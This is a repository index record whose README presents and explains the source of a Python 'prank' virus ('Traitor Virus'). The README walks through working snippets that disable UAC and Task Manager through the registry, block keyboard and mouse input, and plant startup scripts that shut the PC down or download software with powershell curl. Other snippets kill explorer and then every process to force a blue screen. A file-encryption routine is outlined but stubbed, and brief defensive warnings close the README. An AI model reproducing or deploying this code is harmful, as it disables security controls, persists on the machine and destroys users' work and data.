{"id":24782297,"url":"https://github.com/unclecheng-li/traitor-virus","last_synced_at":"2025-03-24T05:28:40.111Z","repository":{"id":274272386,"uuid":"922421199","full_name":"Unclecheng-li/Traitor-virus","owner":"Unclecheng-li","description":"Traitor Virus | 东雪莲病毒 | A computer virus (practical joke exactlly)based on python","archived":false,"fork":false,"pushed_at":"2025-01-27T07:57:04.000Z","size":16308,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-27T08:30:35.338Z","etag":null,"topics":["python","python3","security","security-tools","trojan","virus","virustotal"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Unclecheng-li.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-01-26T06:37:00.000Z","updated_at":"2025-01-27T07:57:45.000Z","dependencies_parsed_at":"2025-01-27T08:30:38.243Z","dependency_job_id":null,"html_url":"https://github.com/Unclecheng-li/Traitor-virus","commit_stats":null,"previous_names":["unclecheng-li/traitor-virus-","unclecheng-li/traitor-virus"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Unclecheng-li%2FTraitor-virus","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Unclecheng-li%2FTraitor-virus/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Unclecheng-li%2FTraitor-virus/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Unclecheng-li%2FTraitor-virus/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Unclecheng-li","download_url":"https://codeload.github.com/Unclecheng-li/Traitor-virus/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245215133,"owners_count":20578920,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["python","python3","security","security-tools","trojan","virus","virustotal"],"created_at":"2025-01-29T11:16:44.779Z","updated_at":"2025-03-24T05:28:40.063Z","avatar_url":"https://github.com/Unclecheng-li.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Traitor Virus | 东雪莲病毒\n\n## Code effect display \n![image](https://github.com/user-attachments/assets/357f63d8-b2fd-4296-9068-c0ca36290f6c)\n![image](https://github.com/user-attachments/assets/cd9439c1-79dc-46ab-b126-c2388b19d043)\n![image](https://github.com/user-attachments/assets/ae1ceae3-dc59-4694-b3f2-859f6507deac)\n\n\n## I. Code Overview \nThis Python code is a malicious program. After obtaining administrator privileges, it performs a series of destructive operations on the computer system. These operations include but are not limited to blocking user input, modifying system settings, automatically downloading programs, encrypting files, disabling the task manager, changing system icons, playing audio and video files, and ultimately attempting to kill all processes, which may cause the system to crash with a blue screen.\n\n## II. Detailed Function Analysis\n\n### 1. Permission Check\n```python\ndef is_admin():\n    try:\n        return ctypes.windll.shell32.IsUserAnAdmin()\n    except:\n        return False\n\nif is_admin():\n    # Malicious operation code\nelse:\n    if sys.version_info[0] == 3:\n        ctypes.windll.shell32.ShellExecuteW(None, \"runas\", sys.executable, __file__, None, 1)\n```\nThe code first checks whether the program is running with administrator privileges. If not, it attempts to request administrator privileges to re - run the program.\n\n### 2. Information Prompt and Keyboard/Mouse Blocking\n```python\ntkinter.messagebox.showinfo('骂谁罕见呢？', '现在退出还来得及')\nuser32 = windll.LoadLibrary(\"C:\\\\Windows\\\\System32\\\\user32.dll\")\nuser32.BlockInput(True)\n```\nA prompt box pops up to alert the user, and then the mouse and keyboard input are blocked to restrict user operations.\n\n### 3. Resource Path Handling\n```python\ndef get_resource_path(relative_path):\n    if hasattr(sys, '_MEIPASS'):\n        return os.path.join(sys._MEIPASS, relative_path)\n    return os.path.join(os.path.abspath(\".\"), relative_path)\n```\nThis function is used to obtain the paths of resources (such as audio and video files) required during the program's runtime.\n\n### 4. System Settings Modification\n\n#### Disable UAC Function\n```python\ndef close_uac():\n    try:\n        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\", 0, winreg.KEY_SET_VALUE)\n        winreg.SetValueEx(key, \"ConsentPromptBehaviorAdmin\", 0, winreg.REG_DWORD, 0)\n        winreg.SetValueEx(key, \"EnableLUA\", 0, winreg.REG_DWORD, 0)\n        winreg.SetValueEx(key, \"PromptOnSecureDesktop\", 0, winreg.REG_DWORD, 0)\n        winreg.CloseKey(key)\n    except Exception as e:\n        print(f\"An error occurred while modifying the registry: {e}\")\n```\nThis code modifies the registry to disable the User Account Control (UAC) function, so that subsequent operations of the program do not require administrator permission confirmation.\n\n#### Set Automatic Shutdown on Startup\n```python\ndef shuTdoWn():\n    bat_content = \"shutdown -s -t 60\"\n    startup_path = os.path.join(os.getenv('APPDATA'), 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')\n    bat_file_path = os.path.join(startup_path, 'shutdown.bat')\n    with open(bat_file_path, \"w\") as file:\n        file.write(bat_content)\n```\nA shutdown script is created in the system startup folder to automatically shut down the computer 60 seconds after startup.\n\n#### Automatically Download Genshin Impact\n```python\ndef GenShin_DownLoad():\n    bat_content = '''\n    @echo off\n    %1(start /min cmd.exe /c %0 :\u0026exit)\n    set curpath=%~dp0 \n    cd /d %curpath%\n    set exename=yuanshen.exe\n    set downurl=https://ys-api.mihoyo.com/event/download_porter/link/ys_cn/official/pc_default\n    powershell curl -o \"%exename%\" \"%downurl%\"\n    '''\n    startup_path = os.path.join(os.getenv('APPDATA'), 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')\n    bat_file_path = os.path.join(startup_path, 'genshin.bat')\n    with open(bat_file_path, \"w\") as file:\n        file.write(bat_content)\n```\nA batch script is created in the system startup folder to automatically download the Genshin Impact game.\n\n### 5. Terminate the Explorer Process\n```python\ndef close_explorer():\n    run('taskkill /F /IM explorer.exe')\ntime.sleep(1.5)\nclose_explorer()\n```\nThe code terminates the Windows Explorer process, which may cause the desktop and taskbar to become unresponsive.\n\n### 6. Pop - up Windows and Play Audio\n```python\ndef boom2():\n    # Code to create a pop - up window\n    pass\n\naudio_files = [hanjian1_path, hanjian2_path, hanjian3_path]\ndef boom3():\n    random_audio = random.choice(audio_files)\n    playsound(random_audio)\n\nthreads1 = []\nthreads2 = []\nthreads3 = []\nfor i in range(15):\n    t0 = threading.Thread(target=boom3)\n    threads3.append(t0)\n    time.sleep(0.1)\n    threads3[i].start()\n    threads1.clear()\n    for j in range(15):\n        t1 = threading.Thread(target=boom2)\n        threads1.append(t1)\n        threads1[j].start()\n```\nMultiple threads are used to create pop - up windows and play random audio files, which may cause the system to become unresponsive.\n\n### 7. Play Video and Audio\n```python\nThread(target=haojing2).start()\nhaojing1()\n```\nA separate thread is used to play an audio file, and then a video file is played, which may consume a large amount of system resources.\n\n### 8. Encrypt Files\n```python\ndef encrypt_file(file_path):\n    # Read file content\n    # Pad data\n    # 3DES encryption\n    # Modify file extension and overwrite the original file\n    pass\n\ndef encrypt_directory_recursive(directory_path):\n    for root, dirs, files in os.walk(directory_path):\n        for file_name in files:\n            file_path = os.path.join(root, file_name)\n            if file_path != current_script:\n                encrypt_file(file_path)\n\ndef encrypt_current_directory():\n    current_dir = os.getcwd()\n    global current_script\n    current_script = os.path.abspath(sys.argv[0])\n    encrypt_directory_recursive(current_dir)\n```\nThe code encrypts all files in the current directory and its subdirectories using 3DES encryption, which may lead to data loss if the encryption key is not properly stored.\n\n### 9. Disable the Task Manager\n```python\ndef reg_disable_taskmgr(dwDisable=True):\n    try:\n        key = winreg.CreateKey(winreg.HKEY_CURRENT_USER, r\"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\")\n        value = int(dwDisable)\n        winreg.SetValueEx(key, \"DisableTaskMgr\", 1, winreg.REG_DWORD, value.to_bytes(4, byteorder='little'))\n        winreg.CloseKey(key)\n    except Exception as e:\n        print(f\"An error occurred: {e}\")\n\ndef disable_task_manager():\n    registry_path = r\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\"\n    registry_name = \"DisableTaskMgr\"\n    value = 1\n    try:\n        reg_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, registry_path, 0, winreg.KEY_SET_VALUE)\n        winreg.SetValueEx(reg_key, registry_name, 0, winreg.REG_SZ, str(value))\n        winreg.CloseKey(reg_key)\n    except WindowsError as e:\n        print(f\"An error occurred while setting the registry: {e}\")\n```\nThe code modifies the registry to disable the Windows Task Manager, preventing users from terminating the malicious program.\n\n### 10. Modify the Default Icon of EXE Files\n```python\ndef set_exe_icon():\n    try:\n        current_path = os.path.abspath(sys.argv[0])\n        current_dir = os.path.dirname(current_path)\n        sys_icon_path = os.path.join(current_dir, hj_path)\n        key = winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, '.exe', 0, winreg.KEY_SET_VALUE)\n        winreg.SetValue(key, '', winreg.REG_SZ, 'exefile')\n        key = winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, 'exefile\\\\DefaultIcon', 0, winreg.KEY_SET_VALUE)\n        winreg.SetValue(key, '', winreg.REG_SZ, sys_icon_path)\n        print(\"Successfully modified the default icon!\")\n    except Exception as e:\n        print(f\"Failed to modify the default icon: {str(e)}\")\n```\nThe code modifies the registry to change the default icon of EXE files.\n\n### 11. Kill All Processes\n```python\nif is_admin():\n    os.system(\"Taskkill /fi \\\"pid ge 1\\\" /f\")\n    input()\n```\nIf the program is running with administrator privileges, it attempts to kill all processes, which will cause the system to crash with a blue screen.\n\n## III. ⚠Warning⚠\n1. **Do not run unknown programs**: Be cautious when downloading and running programs from untrusted sources. Only run software from official and well - known sources.\n2. **Maintain administrator privileges**: Do not run programs with administrator privileges casually. Only grant administrator privileges when necessary.\n3. **Keep the system and antivirus software up - to - date**: Regularly update the operating system and antivirus software to ensure that the latest security patches are installed and malicious programs can be detected and removed in a timely manner.\n4. **Enable UAC**: Keep the User Account Control (UAC) function enabled to receive prompts when programs attempt to make system - level changes.\n5. **Back up important data**: Regularly back up important data to an external storage device or cloud storage to prevent data loss due to malicious attacks.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Funclecheng-li%2Ftraitor-virus","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Funclecheng-li%2Ftraitor-virus","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Funclecheng-li%2Ftraitor-virus/lists"}